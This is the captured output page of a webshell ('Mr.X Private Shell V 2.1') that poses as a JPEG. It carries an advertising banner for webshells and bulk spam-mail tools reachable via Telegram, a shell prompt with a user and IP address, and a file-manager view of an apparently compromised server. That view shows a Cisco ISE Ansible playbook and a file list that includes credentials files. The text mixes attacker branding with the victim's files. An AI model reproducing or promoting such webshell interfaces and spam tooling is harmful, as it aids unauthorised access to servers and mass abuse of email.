����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
- hosts: ise_servers
  gather_facts: false
  name: Certificate management
  tasks:
    # - name: Import certificate into ISE node
    #   cisco.ise.trusted_certificate_import:
    #     ise_hostname: "{{ ise_hostname }}"
    #     ise_username: "{{ ise_username }}"
    #     ise_password: "{{ ise_password }}"
    #     ise_verify: "{{ ise_verify }}"
    #     data: "{{ lookup('file', item) }}"
    #     description: Root CA public certificate
    #     name: RootCert
    #     allowBasicConstraintCAFalse: true
    #     allowOutOfDateCert: false
    #     allowSHA1Certificates: true
    #     trustForCertificateBasedAdminAuth: true
    #     trustForCiscoServicesAuth: true
    #     trustForClientAuth: true
    #     trustForIseAuth: true
    #     validateCertificateExtensions: true
    #   with_fileglob:
    #     - "/Users/rcampos/Downloads/RootCACert.pem"

    - name: Generate CSR
      cisco.ise.csr_generate:
        ise_hostname: "{{ ise_hostname }}"
        ise_username: "{{ ise_username }}"
        ise_password: "{{ ise_password }}"
        ise_verify: "{{ ise_verify }}"
        allowWildCardCert: true
        subjectCommonName: ise.securitydemo.net
        subjectOrgUnit: Sample OU
        subjectOrg: Sample Org
        subjectCity: San Francisco
        subjectState: CA
        subjectCountry: US
        keyType: ECDSA
        keyLength: 1024
        digestType: SHA-256
        usedFor: MULTI-USEw
      register: result

    - name: Set ID value to variable
      ansible.builtin.set_fact:
        csr_id: "{{ result['ise_response']['response'][0]['id']}}"
      when: not ansible_check_mode

    - name: Pause until the CSR has been signed by the CA
      ansible.builtin.pause:
    - name: Bind Signed Certificate
      cisco.ise.bind_signed_certificate:
        ise_hostname: "{{ ise_hostname }}"
        ise_username: "{{ ise_username }}"
        ise_password: "{{ ise_password }}"
        ise_verify: "{{ ise_verify }}"
        admin: true
        allowExtendedValidity: true
        allowOutOfDateCert: true
        allowReplacementOfCertificates: true
        allowReplacementOfPortalGroupTag: true
        data: "{{ lookup('file', item) }}"
        hostName: ise.securitydemo.net
        name: My Signed Certificate
        validateCertificateExtensions: true
        id: "{{ csr_id }}"
        eap: true
        radius: true
        pxgrid: true
        ims: true
        portal: true
      with_fileglob:
        - /Users/rcampos/Downloads/RootCACert.pem
      when: not ansible_check_mode

Filemanager

Name Type Size Permission Actions
group_vars Folder 0755
vars Folder 0755
aci_settings.yml File 1.47 KB 0644
active_directory.yml File 2.63 KB 0644
allowed_protocols.yml File 1.95 KB 0644
anc_policy.yml File 800 B 0644
authorization_profile.yml File 1.37 KB 0644
aws_deployment.yml File 605 B 0644
azure_deployment.yml File 1.87 KB 0644
b.yml File 3.51 KB 0644
backup_create.yml File 1.34 KB 0644
backup_restore.yml File 509 B 0644
backup_schedule.yml File 623 B 0644
byod_portal.yml File 15.4 KB 0644
certificate_management.yml File 2.48 KB 0644
certificate_profile.yml File 781 B 0644
certificates.yml File 1.4 KB 0644
credentials.template File 391 B 0644
credentials.yml File 605 B 0644
csr_export.yml File 1.94 KB 0644
deployment_info.yml File 416 B 0644
device_administration_authentication_rules.yml File 1.99 KB 0644
device_administration_authorization_exception_rules.yml File 1.9 KB 0644
device_administration_authorization_global_exception_rules.yml File 1.71 KB 0644
device_administration_authorization_rules.yml File 1.75 KB 0644
device_administration_network_conditions.yml File 1.56 KB 0644
device_administration_policy_set.yml File 2 KB 0644
device_administration_time_date_conditions.yml File 1.98 KB 0644
downloadable_acl.yml File 1.17 KB 0644
egress_matrix_cell.yml File 2.2 KB 0644
endpoint.yml File 1.36 KB 0644
endpoint_certificate.yml File 590 B 0644
endpoint_group.yml File 505 B 0644
filter_policy.yml File 1.73 KB 0644
hosts File 141 B 0644
identity_group.yml File 916 B 0644
internal_user.yml File 3.3 KB 0644
my_device_portal.yml File 567 B 0644
native_supplicant_profile.yml File 763 B 0644
network_access_authentication_rules.yml File 1.73 KB 0644
network_access_authorization_exception_rules.yml File 1.83 KB 0644
network_access_authorization_global_exception_rules.yml File 1.7 KB 0644
network_access_authorization_rules.yml File 1.71 KB 0644
network_access_conditions.yml File 2.5 KB 0644
network_access_dictionary.yml File 1.25 KB 0644
network_access_dictionary_attribute.yml File 1.29 KB 0644
network_access_network_condition.yml File 1.48 KB 0644
network_access_policy_set.yml File 1.87 KB 0644
network_access_time_date_conditions.yml File 1.68 KB 0644
network_device.yml File 2.27 KB 0644
network_device_group.yml File 2.09 KB 0644
network_device_group_deparments.yml File 5.53 KB 0644
personas_deployment.yml File 471 B 0644
playbookstest.yml File 5.86 KB 0644
portal_global_setting.yml File 1020 B 0644
portal_theme.yml File 882 B 0644
profiler-services.yml File 700 B 0644
radius_server_sequence.yml File 1.56 KB 0644
sponsor_portal.yml File 58.7 KB 0644
support_bundle.yml File 1.97 KB 0644
system_certificate.yml File 1.99 KB 0644
trustsec_nbarapp.yml File 3.84 KB 0644
trustsec_sg_vn_mapping.yml File 2.21 KB 0644
trustsec_vn.yml File 2.29 KB 0644
trustsec_vn_vlan_mapping.yml File 2.22 KB 0644